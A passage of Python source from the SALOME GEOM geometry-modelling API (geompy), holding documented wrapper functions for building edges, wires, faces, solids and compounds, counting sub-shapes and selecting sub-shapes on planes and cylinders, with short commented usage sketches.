publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing an edge or wire that represents
the source pipe's path.
"""
anObj = self.PrimOp.RestorePath(theShape, theBase1, theBase2)
RaiseIfFailed("RestorePath", self.PrimOp)
self._autoPublish(anObj, theName, "path")
return anObj
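
# Sketch of recovering the spine of a previously built pipe-like solid; "pipe"
# and its two end faces base1/base2 are assumed to exist already:
#
#   spine = geompy.RestorePath(pipe, base1, base2)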
## Build a middle path of a pipe-like shape.
# The path shape can be a wire or an edge.
# @param theShape It can be closed or unclosed pipe-like shell
# or a pipe-like solid.
# @param listEdges1, listEdges2 Two bases of the supposed pipe. This
# should be lists of edges of theShape.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @note It is not assumed that exact or approximate copy of theShape
# can be obtained by applying existing Pipe operation on the
# resulting "Path" wire taking theBase1 as the base - it is not
# always possible; though it might work in some particular cases,
# it is not guaranteed. Thus, the RestorePath function should not be
# considered as an exact reverse operation of the Pipe.
#
# @return New GEOM.GEOM_Object, containing an edge or wire that represents
#         the source pipe's "path".
#
# @ref tui_creation_pipe_path "Example"
@ManageTransactions("PrimOp")
def RestorePathEdges (self, theShape, listEdges1, listEdges2, theName=None):
"""
Build a middle path of a pipe-like shape.
The path shape can be a wire or an edge.
Parameters:
theShape It can be closed or unclosed pipe-like shell
or a pipe-like solid.
listEdges1, listEdges2 Two bases of the supposed pipe. This
should be lists of edges of theShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing an edge or wire that represents
the source pipe's path.
"""
anObj = self.PrimOp.RestorePathEdges(theShape, listEdges1, listEdges2)
RaiseIfFailed("RestorePathEdges", self.PrimOp)
self._autoPublish(anObj, theName, "path")
return anObj
# end of l3_complex
## @}
## @addtogroup l3_advanced
## @{
## Create a linear edge with specified ends.
# @param thePnt1 Point for the first end of edge.
# @param thePnt2 Point for the second end of edge.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created edge.
#
# @ref tui_creation_edge "Example"
@ManageTransactions("ShapesOp")
def MakeEdge(self, thePnt1, thePnt2, theName=None):
"""
Create a linear edge with specified ends.
Parameters:
thePnt1 Point for the first end of edge.
thePnt2 Point for the second end of edge.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created edge.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeEdge(thePnt1, thePnt2)
RaiseIfFailed("MakeEdge", self.ShapesOp)
self._autoPublish(anObj, theName, "edge")
return anObj
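
# Sketch: a 100-unit edge along the X axis ("geompy" assumed initialized):
#
#   e = geompy.MakeEdge(geompy.MakeVertex(0, 0, 0), geompy.MakeVertex(100, 0, 0))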
## Create a new edge, corresponding to the given length on the given curve.
# @param theRefCurve The referenced curve (edge).
# @param theLength Length on the referenced curve. It can be negative.
# @param theStartPoint Any point can be selected for it; the new edge will begin
#                      at the end of \a theRefCurve closest to the selected point.
# If None, start from the first point of \a theRefCurve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created edge.
#
# @ref tui_creation_edge "Example"
@ManageTransactions("ShapesOp")
def MakeEdgeOnCurveByLength(self, theRefCurve, theLength, theStartPoint = None, theName=None):
"""
Create a new edge, corresponding to the given length on the given curve.
Parameters:
theRefCurve The referenced curve (edge).
theLength Length on the referenced curve. It can be negative.
theStartPoint Any point can be selected for it; the new edge will begin
              at the end of theRefCurve closest to the selected point.
If None, start from the first point of theRefCurve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created edge.
"""
# Example: see GEOM_TestAll.py
theLength, Parameters = ParseParameters(theLength)
anObj = self.ShapesOp.MakeEdgeOnCurveByLength(theRefCurve, theLength, theStartPoint)
RaiseIfFailed("MakeEdgeOnCurveByLength", self.ShapesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "edge")
return anObj
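
# Sketch: take a quarter of a circle's circumference as a new edge. The circle
# itself is an edge, so it can serve as theRefCurve directly ("geompy" assumed
# initialized):
#
#   import math
#   p0   = geompy.MakeVertex(0, 0, 0)
#   vz   = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   circ = geompy.MakeCircle(p0, vz, 50)
#   arc  = geompy.MakeEdgeOnCurveByLength(circ, 2 * math.pi * 50 / 4)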
## Create an edge from specified wire.
# @param theWire source Wire
# @param theLinearTolerance linear tolerance value (default = 1e-07)
# @param theAngularTolerance angular tolerance value (default = 1e-12)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created edge.
#
# @ref tui_creation_edge "Example"
@ManageTransactions("ShapesOp")
def MakeEdgeWire(self, theWire, theLinearTolerance = 1e-07, theAngularTolerance = 1e-12, theName=None):
"""
Create an edge from specified wire.
Parameters:
theWire source Wire
theLinearTolerance linear tolerance value (default = 1e-07)
theAngularTolerance angular tolerance value (default = 1e-12)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created edge.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeEdgeWire(theWire, theLinearTolerance, theAngularTolerance)
RaiseIfFailed("MakeEdgeWire", self.ShapesOp)
self._autoPublish(anObj, theName, "edge")
return anObj
## Create a wire from the set of edges and wires.
# @param theEdgesAndWires List of edges and/or wires.
# @param theTolerance Maximum distance between vertices that will be merged.
# Values less than 1e-07 are equivalent to 1e-07 (Precision::Confusion())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created wire.
#
# @ref tui_creation_wire "Example"
@ManageTransactions("ShapesOp")
def MakeWire(self, theEdgesAndWires, theTolerance = 1e-07, theName=None):
"""
Create a wire from the set of edges and wires.
Parameters:
theEdgesAndWires List of edges and/or wires.
theTolerance Maximum distance between vertices that will be merged.
Values less than 1e-07 are equivalent to 1e-07 (Precision::Confusion()).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created wire.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeWire(theEdgesAndWires, theTolerance)
RaiseIfFailed("MakeWire", self.ShapesOp)
self._autoPublish(anObj, theName, "wire")
return anObj
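
# Sketch: chain three edges into a closed triangular wire, relying on the
# default merge tolerance ("geompy" assumed initialized):
#
#   pa = geompy.MakeVertex(0, 0, 0)
#   pb = geompy.MakeVertex(100, 0, 0)
#   pc = geompy.MakeVertex(0, 100, 0)
#   wire = geompy.MakeWire([geompy.MakeEdge(pa, pb),
#                           geompy.MakeEdge(pb, pc),
#                           geompy.MakeEdge(pc, pa)])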
## Create a face on the given wire.
# @param theWire closed Wire or Edge to build the face on.
# @param isPlanarWanted If TRUE, the algorithm tries to build a planar face.
# If the tolerance of the obtained planar face is less
# than 1e-06, this face will be returned, otherwise the
# algorithm tries to build any suitable face on the given
# wire and prints a warning message.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("ShapesOp")
def MakeFace(self, theWire, isPlanarWanted, theName=None):
"""
Create a face on the given wire.
Parameters:
theWire closed Wire or Edge to build the face on.
isPlanarWanted If TRUE, the algorithm tries to build a planar face.
If the tolerance of the obtained planar face is less
than 1e-06, this face will be returned, otherwise the
algorithm tries to build any suitable face on the given
wire and prints a warning message.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeFace(theWire, isPlanarWanted)
if isPlanarWanted and anObj is not None and self.ShapesOp.GetErrorCode() == "MAKE_FACE_TOLERANCE_TOO_BIG":
print "WARNING: Cannot build a planar face: required tolerance is too big. Non-planar face is built."
else:
RaiseIfFailed("MakeFace", self.ShapesOp)
self._autoPublish(anObj, theName, "face")
return anObj
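
# Sketch: a planar face built on the closed triangular wire from the MakeWire
# sketch above (isPlanarWanted = 1 requests the planar algorithm first):
#
#   face = geompy.MakeFace(wire, 1)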
## Create a face on the given wires set.
# @param theWires List of closed wires or edges to build the face on.
# @param isPlanarWanted If TRUE, the algorithm tries to build a planar face.
# If the tolerance of the obtained planar face is less
# than 1e-06, this face will be returned, otherwise the
# algorithm tries to build any suitable face on the given
# wire and prints a warning message.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created face.
#
# @ref tui_creation_face "Example"
@ManageTransactions("ShapesOp")
def MakeFaceWires(self, theWires, isPlanarWanted, theName=None):
"""
Create a face on the given wires set.
Parameters:
theWires List of closed wires or edges to build the face on.
isPlanarWanted If TRUE, the algorithm tries to build a planar face.
If the tolerance of the obtained planar face is less
than 1e-06, this face will be returned, otherwise the
algorithm tries to build any suitable face on the given
wire and prints a warning message.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created face.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeFaceWires(theWires, isPlanarWanted)
if isPlanarWanted and anObj is not None and self.ShapesOp.GetErrorCode() == "MAKE_FACE_TOLERANCE_TOO_BIG":
print "WARNING: Cannot build a planar face: required tolerance is too big. Non-planar face is built."
else:
RaiseIfFailed("MakeFaceWires", self.ShapesOp)
self._autoPublish(anObj, theName, "face")
return anObj
## See MakeFaceWires() method for details.
#
# @ref tui_creation_face "Example 1"
# \n @ref swig_MakeFaces "Example 2"
def MakeFaces(self, theWires, isPlanarWanted, theName=None):
"""
See geompy.MakeFaceWires() method for details.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.MakeFaceWires()
anObj = self.MakeFaceWires(theWires, isPlanarWanted, theName)
return anObj
## Create a shell from the set of faces and shells.
# @param theFacesAndShells List of faces and/or shells.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created shell.
#
# @ref tui_creation_shell "Example"
@ManageTransactions("ShapesOp")
def MakeShell(self, theFacesAndShells, theName=None):
"""
Create a shell from the set of faces and shells.
Parameters:
theFacesAndShells List of faces and/or shells.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created shell.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeShell(theFacesAndShells)
RaiseIfFailed("MakeShell", self.ShapesOp)
self._autoPublish(anObj, theName, "shell")
return anObj
## Create a solid, bounded by the given shells.
# @param theShells Sequence of bounding shells.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created solid.
#
# @ref tui_creation_solid "Example"
@ManageTransactions("ShapesOp")
def MakeSolid(self, theShells, theName=None):
"""
Create a solid, bounded by the given shells.
Parameters:
theShells Sequence of bounding shells.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created solid.
"""
# Example: see GEOM_TestAll.py
if len(theShells) == 1:
descr = self._IsGoodForSolid(theShells[0])
#if len(descr) > 0:
# raise RuntimeError, "MakeSolidShells : " + descr
if descr == "WRN_SHAPE_UNCLOSED":
raise RuntimeError, "MakeSolidShells : Unable to create solid from unclosed shape"
anObj = self.ShapesOp.MakeSolidShells(theShells)
RaiseIfFailed("MakeSolidShells", self.ShapesOp)
self._autoPublish(anObj, theName, "solid")
return anObj
## Create a compound of the given shapes.
# @param theShapes List of shapes to put in compound.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created compound.
#
# @ref tui_creation_compound "Example"
@ManageTransactions("ShapesOp")
def MakeCompound(self, theShapes, theName=None):
"""
Create a compound of the given shapes.
Parameters:
theShapes List of shapes to put in compound.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created compound.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.MakeCompound(theShapes)
RaiseIfFailed("MakeCompound", self.ShapesOp)
self._autoPublish(anObj, theName, "compound")
return anObj
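
# Sketch: gather two independent primitives into a single compound for joint
# publication or export ("geompy" assumed initialized):
#
#   box  = geompy.MakeBoxDXDYDZ(10, 10, 10)
#   cyl  = geompy.MakeCylinderRH(5, 20)
#   comp = geompy.MakeCompound([box, cyl])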
# end of l3_advanced
## @}
## @addtogroup l2_measure
## @{
## Gives quantity of faces in the given shape.
# @param theShape Shape to count faces of.
# @return Quantity of faces.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfFaces(self, theShape):
"""
Gives quantity of faces in the given shape.
Parameters:
theShape Shape to count faces of.
Returns:
Quantity of faces.
"""
# Example: see GEOM_TestOthers.py
nb_faces = self.ShapesOp.NumberOfFaces(theShape)
RaiseIfFailed("NumberOfFaces", self.ShapesOp)
return nb_faces
## Gives quantity of edges in the given shape.
# @param theShape Shape to count edges of.
# @return Quantity of edges.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfEdges(self, theShape):
"""
Gives quantity of edges in the given shape.
Parameters:
theShape Shape to count edges of.
Returns:
Quantity of edges.
"""
# Example: see GEOM_TestOthers.py
nb_edges = self.ShapesOp.NumberOfEdges(theShape)
RaiseIfFailed("NumberOfEdges", self.ShapesOp)
return nb_edges
## Gives quantity of sub-shapes of type theShapeType in the given shape.
# @param theShape Shape to count sub-shapes of.
# @param theShapeType Type of sub-shapes to count (see ShapeType())
# @return Quantity of sub-shapes of given type.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfSubShapes(self, theShape, theShapeType):
"""
Gives quantity of sub-shapes of type theShapeType in the given shape.
Parameters:
theShape Shape to count sub-shapes of.
theShapeType Type of sub-shapes to count (see geompy.ShapeType)
Returns:
Quantity of sub-shapes of given type.
"""
# Example: see GEOM_TestOthers.py
nb_ss = self.ShapesOp.NumberOfSubShapes(theShape, theShapeType)
RaiseIfFailed("NumberOfSubShapes", self.ShapesOp)
return nb_ss
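
# Sketch: a box is expected to report 6 faces, 12 edges and 8 vertexes through
# these counters ("geompy" assumed initialized):
#
#   box = geompy.MakeBoxDXDYDZ(10, 10, 10)
#   nf  = geompy.NumberOfFaces(box)                                 # 6
#   ne  = geompy.NumberOfSubShapes(box, geompy.ShapeType["EDGE"])   # 12
#   nv  = geompy.NumberOfSubShapes(box, geompy.ShapeType["VERTEX"]) # 8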
## Gives quantity of solids in the given shape.
# @param theShape Shape to count solids in.
# @return Quantity of solids.
#
# @ref swig_NumberOf "Example"
@ManageTransactions("ShapesOp")
def NumberOfSolids(self, theShape):
"""
Gives quantity of solids in the given shape.
Parameters:
theShape Shape to count solids in.
Returns:
Quantity of solids.
"""
# Example: see GEOM_TestOthers.py
nb_solids = self.ShapesOp.NumberOfSubShapes(theShape, self.ShapeType["SOLID"])
RaiseIfFailed("NumberOfSolids", self.ShapesOp)
return nb_solids
# end of l2_measure
## @}
## @addtogroup l3_healing
## @{
## Reverses the orientation of the given shape.
# @param theShape Shape to be reversed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return The reversed copy of theShape.
#
# @ref swig_ChangeOrientation "Example"
@ManageTransactions("ShapesOp")
def ChangeOrientation(self, theShape, theName=None):
"""
Reverses the orientation of the given shape.
Parameters:
theShape Shape to be reversed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
The reversed copy of theShape.
"""
# Example: see GEOM_TestAll.py
anObj = self.ShapesOp.ChangeOrientation(theShape)
RaiseIfFailed("ChangeOrientation", self.ShapesOp)
self._autoPublish(anObj, theName, "reversed")
return anObj
## See ChangeOrientation() method for details.
#
# @ref swig_OrientationChange "Example"
def OrientationChange(self, theShape, theName=None):
"""
See geompy.ChangeOrientation method for details.
"""
# Example: see GEOM_TestOthers.py
# note: auto-publishing is done in self.ChangeOrientation()
anObj = self.ChangeOrientation(theShape, theName)
return anObj
# end of l3_healing
## @}
## @addtogroup l4_obtain
## @{
## Retrieve all free faces from the given shape.
# A free face is a face that is not shared between two shells of the shape.
# @param theShape Shape to find free faces in.
# @return List of IDs of all free faces, contained in theShape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("ShapesOp")
def GetFreeFacesIDs(self,theShape):
"""
Retrieve all free faces from the given shape.
A free face is a face that is not shared between two shells of the shape.
Parameters:
theShape Shape to find free faces in.
Returns:
List of IDs of all free faces, contained in theShape.
"""
# Example: see GEOM_TestOthers.py
anIDs = self.ShapesOp.GetFreeFacesIDs(theShape)
RaiseIfFailed("GetFreeFacesIDs", self.ShapesOp)
return anIDs
## Get all sub-shapes of theShape1 of the given type, shared with theShape2.
# @param theShape1 Shape to find sub-shapes in.
# @param theShape2 Shape to find shared sub-shapes with.
# @param theShapeType Type of sub-shapes to be retrieved.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of theShape1, shared with theShape2.
#
# @ref swig_GetSharedShapes "Example"
@ManageTransactions("ShapesOp")
def GetSharedShapes(self, theShape1, theShape2, theShapeType, theName=None):
"""
Get all sub-shapes of theShape1 of the given type, shared with theShape2.
Parameters:
theShape1 Shape to find sub-shapes in.
theShape2 Shape to find shared sub-shapes with.
theShapeType Type of sub-shapes to be retrieved.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of theShape1, shared with theShape2.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetSharedShapes(theShape1, theShape2, theShapeType)
RaiseIfFailed("GetSharedShapes", self.ShapesOp)
self._autoPublish(aList, theName, "shared")
return aList
## Get all sub-shapes, shared by all shapes in the list <VAR>theShapes</VAR>.
# @param theShapes Shapes to find common sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of objects, that are sub-shapes of all given shapes.
#
# @ref swig_GetSharedShapes "Example"
@ManageTransactions("ShapesOp")
def GetSharedShapesMulti(self, theShapes, theShapeType, theName=None):
"""
Get all sub-shapes, shared by all shapes in the list theShapes.
Parameters:
theShapes Shapes to find common sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, that are sub-shapes of all given shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetSharedShapesMulti(theShapes, theShapeType)
RaiseIfFailed("GetSharedShapesMulti", self.ShapesOp)
self._autoPublish(aList, theName, "shared")
return aList
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relative to the specified plane in a certain way,
# defined through the <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction and location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnPlane "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlane(self, theShape, theShapeType, theAx1, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relative to the specified plane in a certain way,
defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction and location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlane(theShape, theShapeType, theAx1, theState)
RaiseIfFailed("GetShapesOnPlane", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnPlane")
return aList
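
# Sketch: select the box face lying on the plane z = 0. GEOM.ST_ON is the
# "on the surface" state from the GEOM module; the vector built at the origin
# fixes both the normal and the location of the plane ("geompy" assumed
# initialized):
#
#   import GEOM
#   box    = geompy.MakeBoxDXDYDZ(100, 100, 100)
#   vz     = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   bottom = geompy.GetShapesOnPlane(box, geompy.ShapeType["FACE"], vz, GEOM.ST_ON)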
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relative to the specified plane in a certain way,
# defined through the <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction and location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnPlaneIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlaneIDs(self, theShape, theShapeType, theAx1, theState):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relative to the specified plane in a certain way,
defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction and location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlaneIDs(theShape, theShapeType, theAx1, theState)
RaiseIfFailed("GetShapesOnPlaneIDs", self.ShapesOp)
return aList
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relative to the specified plane in a certain way,
# defined through the <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction of the plane to find shapes on.
# @param thePnt Point specifying location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnPlaneWithLocation "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlaneWithLocation(self, theShape, theShapeType, theAx1, thePnt, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relative to the specified plane in a certain way,
defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction of the plane to find shapes on.
thePnt Point specifying location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlaneWithLocation(theShape, theShapeType,
theAx1, thePnt, theState)
RaiseIfFailed("GetShapesOnPlaneWithLocation", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnPlane")
return aList
## Find in <VAR>theShape</VAR> all sub-shapes of type <VAR>theShapeType</VAR>,
# situated relative to the specified plane in a certain way,
# defined through the <VAR>theState</VAR> parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAx1 Vector (or line, or linear edge), specifying normal
# direction of the plane to find shapes on.
# @param thePnt Point specifying location of the plane to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnPlaneWithLocationIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnPlaneWithLocationIDs(self, theShape, theShapeType, theAx1, thePnt, theState):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relative to the specified plane in a certain way,
defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAx1 Vector (or line, or linear edge), specifying normal
direction of the plane to find shapes on.
thePnt Point specifying location of the plane to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnPlaneWithLocationIDs(theShape, theShapeType,
theAx1, thePnt, theState)
RaiseIfFailed("GetShapesOnPlaneWithLocationIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified cylinder in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnCylinder "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinder(self, theShape, theShapeType, theAxis, theRadius, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified cylinder in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinder(theShape, theShapeType, theAxis, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinder", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnCylinder")
return aList
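
# Sketch: edges of a cylinder lying on its own lateral surface (the two
# circular edges and the seam are the expected result; "geompy" assumed
# initialized):
#
#   import GEOM
#   cyl = geompy.MakeCylinderRH(50, 200)
#   vz  = geompy.MakeVectorDXDYDZ(0, 0, 1)
#   on_edges = geompy.GetShapesOnCylinder(cyl, geompy.ShapeType["EDGE"],
#                                         vz, 50, GEOM.ST_ON)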
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified cylinder in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnCylinderIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnCylinderIDs(self, theShape, theShapeType, theAxis, theRadius, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relative
to the specified cylinder in a certain way, defined through the theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theAxis Vector (or line, or linear edge), specifying
axis of the cylinder to find shapes on.
theRadius Radius of the cylinder to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnCylinderIDs(theShape, theShapeType, theAxis, theRadius, theState)
RaiseIfFailed("GetShapesOnCylinderIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relative
# to the specified cylinder in a certain way, defined through the \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theAxis Vector (or line, or linear edge), specifying
# axis of the cylinder to find shapes on.
# @param thePnt Point specifying location of the bottom of the cylinder.
# @param theRadius Radius of the cylinder to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
